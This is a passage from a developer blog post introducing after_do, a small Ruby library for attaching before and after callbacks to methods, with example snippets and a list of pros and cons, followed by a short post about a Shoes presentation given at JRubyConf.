Another example would be statistics: You might want to keep track of successful purchases, failed logins etc… the code to do so goes in the method that handle these cases but really doesn’t contribute much to its actual purpose. And I’ve seen people use global variables to make statistics gathering available everywhere. Yikes.

With aspect oriented programming you could have all of those in a single file and as a result not clutter the original methods at all.

Access to parameters and the object

For a lot of purposes it’s nice to have access to the parameters of a method call and the object itself – after_do gives you just that:

MyClass.after :two_arg_method do |arg1, arg2, obj|
  something(arg1, arg2, obj)
end

With this you can log events like a succesful purchase:

# Assuming CheckoutProcess#complete gets user as an argument
CheckoutProcess.after :complete do |user, checkout|
  @logger.log "#{user.name} checked out #{checkout.id}"
end

Removing repetition

Another use case is removing repetition from within a class. E.g. if you want to call the save method of an object after several different methods you can do the following:

class CoolClass
  extend AfterDo
  # lots of methods
  after :m1, :m2, :m3 do |*args, object| object.save end
end

This might remind you a bit of before_action/filter in Rails controllers.

How does it work?

When you attach a callback to a method with after_do what it basically does is it creates a copy of that method and then redefines the method to basically look like this (pseudo code):


execute_before_callbacks
return_value = original_method
execute_after_callbacks
return_value

Why build something like this?

I was working on a side project after reading Objects on Rails and wanted to try to separate the persistence concern from the actual Object domain logic. For the fun of it and remove repetition along the way. My initial research didn’t come up with a good maintained tiny library to serve my purpose. So I wrote one myself, named it after_do et voila there is the solution to my initial problem:

persistor  = FilePersistor.new
Activity.extend AfterDo
Activity.after :start, :pause, :finish, :resurrect,
               :do_today, :do_another_day do |activity|
  persistor.save activity
end

Nice, isn’t it?

Is this a good idea?

Always depends on what you are doing with it. As many things out there it has its use cases but can easily be misused.

Advantages

  • Get cross cutting concerns packed together in one file – don’t have them scattered all over your code base obfuscating what the real responsibility of that class is
  • Don’t repeat yourself, define what is happening when in one file
  • I feel like it helps the Single Responsibility principle, as it enables classes to focus on what their main responsibility is and not deal with other stuff

Drawbacks

  • You lose clarity. With callbacks after a method it is not immediately visible what happens when a method is called as some behavior might be defined elsewhere.
  • You could use this to modify the behavior of classes everywhere. Don’t. Use it for what it is meant to be used for – a concern that is not the primary concern of the class you are adding the callback to but that class is still involved with.

A use case I feel this is particularly made for is redrawing. That’s what we use it for over at shoes4. E.g. we have multiple objects and different actions on these objects may trigger a redraw (such changing the position of a circle). This concern could be littered and repeated all over the code base. Or nicely packed into one file where you don’t repeat yourself for similar redrawing scenarios and you see all the redraws at one glance. Furthermore it makes it easier to do things like “Just do one redraw every 1/30s” (not yet implemented though).

Ultimately, you be the judge. I’d be happy if you were to go ahead and give after_do a try, say what you think about it, report bugs and feature requests.

Shoes Presentation from JRubyConf

So today i gave my first full time presentation at a conference – JRubyConf that is. It went well! Thanks for having me! 🙂

My presentation itself was written and presented in shoes (yes a presentation about shoes in shoes!) and you can grab it on my github repository (there are instructions there how to install/run it)  – but I thought providing a PDF with the screenshots of the presentation might be nice.  But I really encourage you to try the shoes version, you get way nicer effects there 🙂 And yes my little presentation tool doesn’t have PDF export – yet 😉

So here you can get the presentation:

Have a great week, try out shoes and most importantly Shoes on!

Tobi